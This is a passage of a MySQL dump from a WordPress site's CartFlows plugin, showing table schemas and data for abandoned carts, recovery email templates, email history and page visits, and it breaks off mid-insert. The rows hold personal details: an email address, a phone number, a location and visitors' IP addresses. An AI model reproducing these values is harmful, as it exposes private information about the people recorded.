-- MySQL dump 10.16  Distrib 10.2.25-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: digit626_wp31
-- ------------------------------------------------------
-- Server version	10.2.25-MariaDB-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wpxb_cartflows_ca_cart_abandonment`
--

DROP TABLE IF EXISTS `wpxb_cartflows_ca_cart_abandonment`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cartflows_ca_cart_abandonment` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `checkout_id` int(11) NOT NULL,
  `email` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `cart_contents` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `cart_total` decimal(10,2) DEFAULT NULL,
  `session_id` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL,
  `other_fields` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `order_status` enum('normal','abandoned','completed','lost') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'normal',
  `unsubscribed` tinyint(1) DEFAULT 0,
  `coupon_code` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `time` datetime DEFAULT current_timestamp(),
  PRIMARY KEY (`id`,`session_id`),
  UNIQUE KEY `session_id_UNIQUE` (`session_id`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cartflows_ca_cart_abandonment`
--

LOCK TABLES `wpxb_cartflows_ca_cart_abandonment` WRITE;
/*!40000 ALTER TABLE `wpxb_cartflows_ca_cart_abandonment` DISABLE KEYS */;
INSERT INTO `wpxb_cartflows_ca_cart_abandonment` VALUES (12,6,'nsy@gmail.com','a:1:{s:32:\"ea5d2f1c4608232e07d3aa3d998e5135\";a:12:{s:3:\"key\";s:32:\"ea5d2f1c4608232e07d3aa3d998e5135\";s:10:\"product_id\";i:64;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:2250;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:2250;s:8:\"line_tax\";i:0;s:4:\"data\";O:17:\"WC_Product_Simple\":1:{s:5:\"\0*\0id\";i:64;}}}',2250.00,'dd9d3430ff60736ce3ed1bbc77b0d05f','a:19:{s:19:\"wcf_billing_company\";s:0:\"\";s:21:\"wcf_billing_address_1\";s:12:\"192.168.3.60\";s:21:\"wcf_billing_address_2\";s:0:\"\";s:17:\"wcf_billing_state\";s:2:\"WC\";s:20:\"wcf_billing_postcode\";s:4:\"4525\";s:23:\"wcf_shipping_first_name\";s:0:\"\";s:22:\"wcf_shipping_last_name\";s:0:\"\";s:20:\"wcf_shipping_company\";s:0:\"\";s:20:\"wcf_shipping_country\";s:0:\"\";s:22:\"wcf_shipping_address_1\";s:0:\"\";s:22:\"wcf_shipping_address_2\";s:0:\"\";s:17:\"wcf_shipping_city\";s:0:\"\";s:18:\"wcf_shipping_state\";s:0:\"\";s:21:\"wcf_shipping_postcode\";s:0:\"\";s:18:\"wcf_order_comments\";s:0:\"\";s:14:\"wcf_first_name\";s:4:\"gghh\";s:13:\"wcf_last_name\";s:3:\"hgg\";s:16:\"wcf_phone_number\";s:9:\"623465225\";s:12:\"wcf_location\";s:13:\"ZA, Cape town\";}','abandoned',0,'','2019-08-07 11:19:23');
/*!40000 ALTER TABLE `wpxb_cartflows_ca_cart_abandonment` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cartflows_ca_email_history`
--

DROP TABLE IF EXISTS `wpxb_cartflows_ca_email_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cartflows_ca_email_history` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `template_id` bigint(20) NOT NULL,
  `ca_session_id` varchar(60) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `coupon_code` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `scheduled_time` datetime DEFAULT NULL,
  `email_sent` tinyint(1) DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `template_id` (`template_id`),
  KEY `ca_session_id` (`ca_session_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cartflows_ca_email_history`
--

LOCK TABLES `wpxb_cartflows_ca_email_history` WRITE;
/*!40000 ALTER TABLE `wpxb_cartflows_ca_email_history` DISABLE KEYS */;
INSERT INTO `wpxb_cartflows_ca_email_history` VALUES (1,2,'cd85209c0c5f109e4343e8dfa91eef1a','','2019-08-06 08:45:24',-1),(2,2,'dd9d3430ff60736ce3ed1bbc77b0d05f','','2019-08-08 11:19:23',1);
/*!40000 ALTER TABLE `wpxb_cartflows_ca_email_history` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cartflows_ca_email_templates`
--

DROP TABLE IF EXISTS `wpxb_cartflows_ca_email_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cartflows_ca_email_templates` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `template_name` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `email_subject` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `email_body` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `is_activated` tinyint(1) NOT NULL DEFAULT 0,
  `frequency` int(11) NOT NULL,
  `frequency_unit` enum('MINUTE','HOUR','DAY') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'MINUTE',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cartflows_ca_email_templates`
--

LOCK TABLES `wpxb_cartflows_ca_email_templates` WRITE;
/*!40000 ALTER TABLE `wpxb_cartflows_ca_email_templates` DISABLE KEYS */;
INSERT INTO `wpxb_cartflows_ca_email_templates` VALUES (1,'Purchase Issue','Purchase issue?','<p>Hi {{customer.firstname}}!</p>\n<p>We&#039;re having trouble processing your recent purchase. Would you mind completing it?</p>\n<p>Here&#039;s a link to continue where you left off:</p>\n<p><a href=\"{{cart.checkout_url}}\" target=\"_blank\" rel=\"noopener\"> Continue Your Purchase Now </a></p>\n<p>Kindly,<br />\n{{admin.firstname}}<br />\n{{admin.company}}</p>\n<p>{{cart.unsubscribe}}</p>\n',0,30,'MINUTE'),(2,'Need Help','Need help?','<p>Hi {{customer.firstname}}!</p>\n<p>I&#039;m {{admin.firstname}}, and I help handle customer issues at {{admin.company}}.</p>\n<p>I just noticed that you tried to make a purchase, but unfortunately, there was some trouble. Is there anything I can do to help?</p>\n<p>You should be able to complete your checkout in less than a minute:<br />\n<a href=\"{{cart.checkout_url}}\" target=\"_blank\" rel=\"noopener\"> Click here to continue your purchase </a></p>\n<p>Thanks!<br />\n{{admin.firstname}}<br />\n{{admin.company}}</p>\n<p>{{cart.unsubscribe}}</p>\n',1,1,'DAY'),(3,'Sample Email Template 3','Exclusive discount for you. Let\'s get things started!','<p>Few days back you left {{cart.product.names}} in your cart.</p><p>To help make up your mind, we have added an exclusive 10% discount coupon {{cart.coupon_code}} to your cart.</p><p><a href=\'{{cart.checkout_url}}\' target=\'_blank\' rel=\'noopener\'>Complete Your Purchase Now &gt;&gt;</a></p><p>Hurry! This is a onetime offer and will expire in 24 Hours.</p><p>In case you couldn\\\'t finish your order due to technical difficulties or because you need some help, just reply to this email we will be happy to help.</p><p>Kind Regards,<br />{{admin.firstname}}<br />{{admin.company}}</p><p>{{cart.unsubscribe}}</p>',0,3,'DAY');
/*!40000 ALTER TABLE `wpxb_cartflows_ca_email_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cartflows_ca_email_templates_meta`
--

DROP TABLE IF EXISTS `wpxb_cartflows_ca_email_templates_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cartflows_ca_email_templates_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `email_template_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `email_template_id` (`email_template_id`)
) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cartflows_ca_email_templates_meta`
--

LOCK TABLES `wpxb_cartflows_ca_email_templates_meta` WRITE;
/*!40000 ALTER TABLE `wpxb_cartflows_ca_email_templates_meta` DISABLE KEYS */;
INSERT INTO `wpxb_cartflows_ca_email_templates_meta` VALUES (1,1,'override_global_coupon',''),(2,1,'discount_type','percent'),(3,1,'coupon_amount','10'),(4,1,'coupon_expiry_date','0'),(5,1,'coupon_expiry_unit','hours'),(6,2,'override_global_coupon',''),(7,2,'discount_type','percent'),(8,2,'coupon_amount','10'),(9,2,'coupon_expiry_date','0'),(10,2,'coupon_expiry_unit','hours'),(11,3,'override_global_coupon',''),(12,3,'discount_type','percent'),(13,3,'coupon_amount','10'),(14,3,'coupon_expiry_date',''),(15,3,'coupon_expiry_unit','hours');
/*!40000 ALTER TABLE `wpxb_cartflows_ca_email_templates_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cartflows_visits`
--

DROP TABLE IF EXISTS `wpxb_cartflows_visits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cartflows_visits` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `step_id` bigint(20) NOT NULL,
  `date_visited` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `visit_type` enum('new','return') COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=219 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cartflows_visits`
--

LOCK TABLES `wpxb_cartflows_visits` WRITE;
/*!40000 ALTER TABLE `wpxb_cartflows_visits` DISABLE KEYS */;
INSERT INTO `wpxb_cartflows_visits` VALUES (1,31301,'2019-07-18 14:35:21','new'),(2,31301,'2019-07-18 14:35:31','new'),(3,31301,'2019-07-18 14:37:43','return'),(4,31301,'2019-07-18 14:38:17','return'),(5,31301,'2019-07-18 14:40:08','return'),(6,31301,'2019-07-18 14:46:29','return'),(7,31301,'2019-07-18 14:47:27','return'),(8,31301,'2019-07-18 14:50:54','return'),(9,31301,'2019-07-18 14:53:18','return'),(10,31301,'2019-07-18 14:53:45','return'),(11,31301,'2019-07-18 14:55:19','return'),(12,31301,'2019-07-18 14:55:57','return'),(13,31301,'2019-07-18 14:59:43','return'),(14,31301,'2019-07-18 15:00:40','return'),(15,31301,'2019-07-18 15:02:23','return'),(16,31301,'2019-07-18 15:03:31','return'),(17,31301,'2019-07-18 15:05:40','return'),(18,31301,'2019-07-18 20:07:33','return'),(19,31301,'2019-07-18 20:07:35','return'),(20,31301,'2019-07-18 20:16:51','return'),(21,31301,'2019-07-18 20:17:18','return'),(22,31301,'2019-07-18 20:19:17','return'),(23,31362,'2019-07-18 20:22:14','new'),(24,31362,'2019-07-18 20:27:01','return'),(25,31362,'2019-07-18 20:29:24','return'),(26,31362,'2019-07-18 20:31:35','return'),(27,31362,'2019-07-18 20:32:44','return'),(28,31362,'2019-07-18 20:33:44','return'),(29,31362,'2019-07-18 20:34:34','return'),(30,31362,'2019-07-18 20:35:20','return'),(31,31362,'2019-07-18 20:52:04','return'),(32,31362,'2019-07-18 20:53:49','return'),(33,31362,'2019-07-18 21:11:58','return'),(34,31362,'2019-07-18 21:12:03','return'),(35,31362,'2019-07-18 21:15:50','return'),(36,31362,'2019-07-18 21:26:10','return'),(37,31362,'2019-07-18 21:27:20','return'),(38,31362,'2019-07-18 21:28:18','return'),(39,31362,'2019-07-18 21:31:58','return'),(40,31362,'2019-07-18 21:35:09','return'),(41,31362,'2019-07-18 21:36:31','return'),(42,31362,'2019-07-18 21:38:01','return'),(43,31362,'2019-07-18 21:46:36','return'),(44,31362,'2019-07-18 21:46:59','return'),(45,31362,'2019-07-18 21:49:04','return'),(46,31315,'2019-07-18 21:50:51','new'),(47,31392,'2019-07-18 22:03:41','new'),(48,31392,'2019-07-18 22:03:58','return'),(49,31362,'2019-07-19 20:51:08','return'),(50,31390,'2019-07-19 20:51:28','new'),(51,31362,'2019-07-19 20:58:11','return'),(52,31362,'2019-07-19 21:00:13','return'),(53,31390,'2019-07-19 21:00:23','return'),(54,31362,'2019-07-19 21:01:30','return'),(55,31362,'2019-07-20 11:04:45','return'),(56,31362,'2019-07-20 11:05:34','return'),(57,31362,'2019-07-20 11:07:39','return'),(58,31362,'2019-07-20 11:07:51','return'),(59,31362,'2019-07-20 11:13:54','return'),(60,31362,'2019-07-20 11:15:35','return'),(61,31362,'2019-07-20 11:17:07','return'),(62,31362,'2019-07-20 11:17:50','return'),(63,31362,'2019-07-20 11:19:47','return'),(64,31362,'2019-07-20 11:20:45','return'),(65,31362,'2019-07-20 11:21:18','return'),(66,31362,'2019-07-20 11:24:48','return'),(67,31362,'2019-07-20 11:25:02','return'),(68,31362,'2019-07-20 11:28:16','return'),(69,31362,'2019-07-20 11:28:16','return'),(70,31362,'2019-07-20 11:28:29','return'),(71,31362,'2019-07-20 11:30:02','return'),(72,31362,'2019-07-20 11:30:33','return'),(73,31362,'2019-07-20 11:58:35','return'),(74,31362,'2019-07-20 11:58:53','return'),(75,31362,'2019-07-20 12:00:38','return'),(76,31362,'2019-07-20 12:01:02','return'),(77,31362,'2019-07-20 12:02:26','return'),(78,30040,'2019-07-20 12:02:58','new'),(79,30040,'2019-07-20 12:03:29','return'),(80,31362,'2019-07-20 12:05:22','return'),(81,31362,'2019-07-20 12:07:31','return'),(82,31362,'2019-07-20 12:10:17','return'),(83,31362,'2019-07-20 12:10:31','return'),(84,31362,'2019-07-20 12:12:50','return'),(85,31390,'2019-07-20 12:15:31','return'),(86,31362,'2019-07-20 12:29:09','return'),(87,31362,'2019-07-20 12:33:51','return'),(88,31390,'2019-07-20 12:56:42','return'),(89,31362,'2019-07-20 13:00:52','return'),(90,31362,'2019-07-20 13:04:37','return'),(91,31362,'2019-07-20 13:04:53','return'),(92,31362,'2019-07-20 13:09:51','return'),(93,31362,'2019-07-20 21:25:08','return'),(94,31362,'2019-07-20 21:25:46','return'),(95,31362,'2019-07-20 21:26:49','return'),(96,31362,'2019-07-20 21:32:40','return'),(97,31362,'2019-07-22 08:17:42','new'),(98,31362,'2019-07-22 08:30:41','return'),(99,31362,'2019-07-22 08:32:07','return'),(100,31362,'2019-07-22 08:32:39','return'),(101,31362,'2019-07-22 08:34:11','return'),(102,31390,'2019-07-22 08:34:27','new'),(103,31390,'2019-07-22 08:35:18','return'),(104,31390,'2019-07-22 08:38:41','return'),(105,31362,'2019-07-22 09:22:31','return'),(106,31390,'2019-07-22 09:31:02','return'),(107,31390,'2019-07-22 09:32:06','return'),(108,31390,'2019-07-22 09:34:07','return'),(109,31390,'2019-07-22 09:36:04','return'),(110,31390,'2019-07-22 09:36:39','return'),(111,31362,'2019-07-23 16:52:46','new'),(112,31362,'2019-07-23 17:29:20','return'),(113,31362,'2019-07-23 17:31:02','return'),(114,31362,'2019-07-23 17:46:48','return'),(115,31362,'2019-07-23 18:13:10','return'),(116,31362,'2019-07-23 18:13:22','return'),(117,31362,'2019-07-23 18:17:34','return'),(118,31362,'2019-07-23 18:21:21','return'),(119,31362,'2019-07-23 18:21:38','return'),(120,31362,'2019-07-23 18:24:38','return'),(121,31362,'2019-07-23 19:21:49','return'),(122,31362,'2019-07-23 19:44:57','new'),(123,31362,'2019-07-23 19:45:10','new'),(124,31362,'2019-07-23 19:45:11','new'),(125,31362,'2019-07-23 19:45:11','new'),(126,31362,'2019-07-23 20:05:02','new'),(127,31362,'2019-07-23 20:05:24','new'),(128,31362,'2019-07-23 20:06:12','new'),(129,31362,'2019-07-23 20:06:15','new'),(130,31362,'2019-07-23 20:06:17','new'),(131,31362,'2019-07-23 20:06:24','new'),(132,31362,'2019-07-23 20:06:35','new'),(133,31362,'2019-07-23 20:06:39','new'),(134,31362,'2019-07-23 20:06:40','new'),(135,31362,'2019-07-23 20:06:42','new'),(136,31362,'2019-07-23 20:07:46','new'),(137,31362,'2019-07-23 20:08:14','new'),(138,31362,'2019-07-23 20:08:15','new'),(139,31362,'2019-07-23 20:08:17','new'),(140,31362,'2019-07-25 10:34:57','return'),(141,31362,'2019-07-25 11:58:21','new'),(142,31362,'2019-07-25 11:58:21','new'),(143,31362,'2019-07-26 08:01:46','new'),(144,31362,'2019-07-27 13:31:52','new'),(145,31362,'2019-07-31 10:11:09','new'),(146,31362,'2019-07-31 11:10:39','new'),(147,31362,'2019-07-31 11:42:53','new'),(148,31362,'2019-08-01 08:16:48','new'),(149,31362,'2019-08-01 10:02:41','new'),(150,31362,'2019-08-01 10:03:25','new'),(151,31362,'2019-08-01 10:10:10','return'),(152,31362,'2019-08-01 10:13:52','new'),(153,31390,'2019-08-01 10:18:34','new'),(154,31390,'2019-08-01 10:19:26','return'),(155,31362,'2019-08-01 10:41:20','new'),(156,31362,'2019-08-01 10:43:00','new'),(157,31362,'2019-08-01 10:50:01','return'),(158,31362,'2019-08-01 13:09:29','new'),(159,31362,'2019-08-01 15:29:59','new'),(160,31362,'2019-08-01 15:31:19','return'),(161,31362,'2019-08-01 15:32:40','return'),(162,31362,'2019-08-01 15:36:34','return'),(163,31362,'2019-08-01 15:39:16','return'),(164,31362,'2019-08-01 15:40:16','new'),(165,31390,'2019-08-01 15:41:32','new'),(166,31362,'2019-08-01 15:57:32','new'),(167,31362,'2019-08-01 16:32:34','new'),(168,31362,'2019-08-01 16:49:51','return'),(169,31362,'2019-08-01 16:51:32','return'),(170,31362,'2019-08-01 16:53:23','return'),(171,31362,'2019-08-01 16:58:06','return'),(172,31362,'2019-08-01 16:58:09','return'),(173,31362,'2019-08-01 17:00:20','return'),(174,31362,'2019-08-01 18:15:59','new'),(175,31362,'2019-08-01 18:30:03','new'),(176,31362,'2019-08-01 19:57:26','return'),(177,31362,'2019-08-01 20:00:53','return'),(178,31362,'2019-08-02 07:52:47','return'),(179,31362,'2019-08-02 08:01:07','new'),(180,31362,'2019-08-05 08:07:30','new'),(181,31390,'2019-08-05 08:08:33','new'),(182,31362,'2019-08-05 08:49:06','return'),(183,31390,'2019-08-05 08:49:51','return'),(184,31362,'2019-08-05 09:58:04','return'),(185,31390,'2019-08-05 09:58:39','return'),(186,31362,'2019-08-14 17:28:00','new'),(187,31362,'2019-08-17 07:57:52','new'),(188,31362,'2019-08-20 21:36:54','new'),(189,31362,'2019-08-21 19:04:46','new'),(190,31362,'2019-08-21 19:05:35','return'),(191,31362,'2019-08-22 14:04:40','new'),(192,31362,'2019-08-23 07:03:30','return'),(193,31362,'2019-08-23 07:23:11','new'),(194,31362,'2019-08-23 09:52:41','return'),(195,33135,'2019-08-24 11:56:23','new'),(196,33135,'2019-08-24 12:34:29','return'),(197,33135,'2019-08-24 12:34:46','return'),(198,33135,'2019-08-24 12:35:22','return'),(199,33135,'2019-08-24 12:37:53','return'),(200,33135,'2019-08-24 12:40:48','return'),(201,33135,'2019-08-24 12:43:57','return'),(202,33135,'2019-08-24 13:10:50','return'),(203,33135,'2019-08-24 13:26:32','return'),(204,33135,'2019-08-24 13:30:49','return'),(205,33135,'2019-08-24 13:31:38','return'),(206,33135,'2019-08-25 13:36:08','new'),(207,31362,'2019-08-26 13:14:07','new'),(208,31362,'2019-08-26 13:15:52','return'),(209,31362,'2019-08-26 13:16:58','return'),(210,31362,'2019-08-26 13:39:42','return'),(211,31362,'2019-08-26 13:40:18','return'),(212,31362,'2019-08-26 13:41:20','return'),(213,31362,'2019-08-26 13:43:36','return'),(214,31362,'2019-08-26 13:48:31','return'),(215,31362,'2019-08-26 14:10:11','return'),(216,31362,'2019-08-26 14:10:11','return'),(217,31362,'2019-08-26 14:11:02','return'),(218,33135,'2019-08-26 14:48:03','new');
/*!40000 ALTER TABLE `wpxb_cartflows_visits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cartflows_visits_meta`
--

DROP TABLE IF EXISTS `wpxb_cartflows_visits_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cartflows_visits_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `visit_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=388 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cartflows_visits_meta`
--

LOCK TABLES `wpxb_cartflows_visits_meta` WRITE;
/*!40000 ALTER TABLE `wpxb_cartflows_visits_meta` DISABLE KEYS */;
INSERT INTO `wpxb_cartflows_visits_meta` VALUES (1,1,'user_ip_address','165.255.168.204'),(2,1,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31301&action=edit'),(3,2,'user_ip_address','165.255.168.204'),(4,2,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31301&action=edit'),(5,3,'user_ip_address','165.255.168.204'),(6,3,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(7,4,'user_ip_address','165.255.168.204'),(8,4,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(9,5,'user_ip_address','165.255.168.204'),(10,5,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(11,6,'user_ip_address','165.255.168.204'),(12,6,'http_referer','http://companyregistration.online/checkout-page-2/'),(13,7,'user_ip_address','165.255.168.204'),(14,7,'http_referer','http://companyregistration.online/checkout-page-2/'),(15,8,'user_ip_address','165.255.168.204'),(16,8,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(17,9,'user_ip_address','165.255.168.204'),(18,9,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(19,10,'user_ip_address','165.255.168.204'),(20,10,'http_referer','http://companyregistration.online/checkout-page-2/'),(21,11,'user_ip_address','165.255.168.204'),(22,11,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31301&action=edit'),(23,12,'user_ip_address','165.255.168.204'),(24,12,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31301&action=edit'),(25,13,'user_ip_address','165.255.168.204'),(26,13,'http_referer','http://companyregistration.online/checkout-page-2/'),(27,14,'user_ip_address','165.255.168.204'),(28,14,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31301&action=edit'),(29,15,'user_ip_address','165.255.168.204'),(30,15,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31301&action=edit'),(31,16,'user_ip_address','165.255.168.204'),(32,16,'http_referer','http://companyregistration.online/checkout-page-2/'),(33,17,'user_ip_address','165.255.168.204'),(34,17,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(35,18,'user_ip_address','105.184.163.213'),(36,18,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(37,19,'user_ip_address','105.184.163.213'),(38,19,'http_referer','http://companyregistration.online/checkout-page-2/'),(39,20,'user_ip_address','105.184.163.213'),(40,20,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(41,21,'user_ip_address','105.184.163.213'),(42,21,'http_referer','http://companyregistration.online/checkout-page-2/'),(43,22,'user_ip_address','105.184.163.213'),(44,22,'http_referer','http://companyregistration.online/checkout-page-2/?et_fb=1&PageSpeed=off'),(45,23,'user_ip_address','105.184.163.213'),(46,23,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(47,24,'user_ip_address','105.184.163.213'),(48,24,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(49,25,'user_ip_address','105.184.163.213'),(50,25,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(51,26,'user_ip_address','105.184.163.213'),(52,26,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(53,27,'user_ip_address','105.184.163.213'),(54,27,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(55,28,'user_ip_address','105.184.163.213'),(56,28,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(57,29,'user_ip_address','105.184.163.213'),(58,29,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit&highlight-step-id=31362'),(59,30,'user_ip_address','105.184.163.213'),(60,30,'http_referer','http://companyregistration.online/checkout-2/'),(61,31,'user_ip_address','105.184.163.213'),(62,31,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(63,32,'user_ip_address','105.184.163.213'),(64,32,'http_referer','http://companyregistration.online/checkout-2/'),(65,33,'user_ip_address','105.184.163.213'),(66,33,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(67,34,'user_ip_address','105.184.163.213'),(68,34,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(69,35,'user_ip_address','105.184.163.213'),(70,35,'http_referer','http://companyregistration.online/checkout-2/'),(71,36,'user_ip_address','105.184.163.213'),(72,36,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(73,37,'user_ip_address','105.184.163.213'),(74,37,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(75,38,'user_ip_address','105.184.163.213'),(76,38,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(77,39,'user_ip_address','105.184.163.213'),(78,39,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(79,40,'user_ip_address','105.184.163.213'),(80,40,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(81,41,'user_ip_address','105.184.163.213'),(82,41,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(83,42,'user_ip_address','105.184.163.213'),(84,42,'http_referer','http://companyregistration.online/checkout-2/'),(85,43,'user_ip_address','105.184.163.213'),(86,43,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(87,44,'user_ip_address','105.184.163.213'),(88,44,'http_referer','http://companyregistration.online/checkout-2/'),(89,45,'user_ip_address','105.184.163.213'),(90,45,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(91,46,'user_ip_address','105.184.163.213'),(92,46,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(93,47,'user_ip_address','105.184.163.213'),(94,47,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(95,48,'user_ip_address','105.184.163.213'),(96,48,'http_referer','http://companyregistration.online/checkout-woo-2/'),(97,49,'user_ip_address','105.184.163.213'),(98,49,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(99,50,'user_ip_address','105.184.163.213'),(100,50,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(101,51,'user_ip_address','105.184.163.213'),(102,51,'http_referer','http://companyregistration.online/checkout-2/'),(103,52,'user_ip_address','105.184.163.213'),(104,52,'http_referer','http://companyregistration.online/checkout-2/'),(105,53,'user_ip_address','105.184.163.213'),(106,53,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&